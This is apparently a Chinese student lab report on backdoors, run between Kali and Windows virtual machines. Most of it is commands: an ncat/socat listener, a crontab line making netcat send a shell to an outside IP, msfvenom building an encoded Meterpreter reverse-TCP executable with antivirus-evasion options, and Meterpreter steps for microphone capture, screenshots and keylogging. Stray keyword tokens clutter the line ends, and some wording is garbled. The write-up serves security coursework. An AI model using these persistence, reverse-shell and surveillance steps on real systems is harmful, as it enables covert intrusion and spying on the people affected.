例举你能想到的一个后门进入到你系统中的可能方式?linux
在网站上下载非官方软件,所下载的软件中携带假装过的后门程序。shell
例举你知道的后门如何启动起来(win及linux)的方式?windows
将后门程序假装为被启动项目。网络
Meterpreter有哪些给你映像深入的功能?tcp
记录音频、获取入侵主机权限。编辑器
如何发现本身有系统有没有被安装后门?工具
使用杀毒软件进行查杀。网站
使用MSF meterpreter(或其余软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权ui
ipconfig
获取windows系统的IP地址和相关信息。
打开终端,输入ifconfig -a
获取Kali的IP地址和相关信息。编码
如下实践Windows基于Win10-64bit, Kali2-64bit.
如下实践Windows基于Win7-64bit, Kali2-64bit.(后同)
1.Linux运行监听指令
2.Windows反弹链接Linux
3.Linux下看到Windows的命令提示
在win7的cmd中使用ncat.exe -l 5330
监听端口,Kali中使用nc win7主机IP 5330
链接win7系统输入数据,在win7同步显示。
crontab -e
指令编辑一条定时任务(使用VIM编辑器编辑),在最后一行添加43 * * * * /bin/netcat 192.168.1.200 5215 -e /bin/sh
(时间设置在Kali系统当前时间的后一分钟)时间到43分时,windows系统得到Kali的shell,在cmd中输入命令whoami
获得结果
在Kali环境下输入指令socat - tcp:192.168.204.135:5330,第一个参数-表明标准的输入输出,第二个流链接到Windows主机的5330端口,此时可成功得到cmd shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.204.135 LPORT=5330 -f exe > 20155330_backdoor.exe
生成后门程序
参数说明:
参数 | 相关说明 |
---|---|
-p | 使用的payload。windows/meterpreter/reverse_tcp至关于shellcode。 |
-x | 使用的可执行文件模板,payload(shellcode)写入到该可执行文件中。 |
-e | 使用的编码器,用于对shellcode变形,为了免杀。 |
-i | 编码器的迭代次数。 |
-b | badchar是payload中须要去除的字符。 |
LHOST | 是反弹回连的IP |
LPORT | 是回连的端口 |
-f | 生成文件的类型 |
> | 输出到哪一个文件 |
msfconsole
use exploit/multi/handler
进行侦听,并设置相关参数.record_mic
截获一段音频screenshot
截屏keyscan_start
指令记录击键的过程,使用keyscan_dump
指令读取击键的记录getuid
指令查看当前用户这次实验首先要保证Kali和windows系统主机可以经过网络相互链接,才能进行以后的步骤。实验中主要遇到的问题就是电脑的摄像头没法链接到虚拟机,甚至在本机上也常常出现错误,应该是开学初的强制更新过程当中驱动出了问题。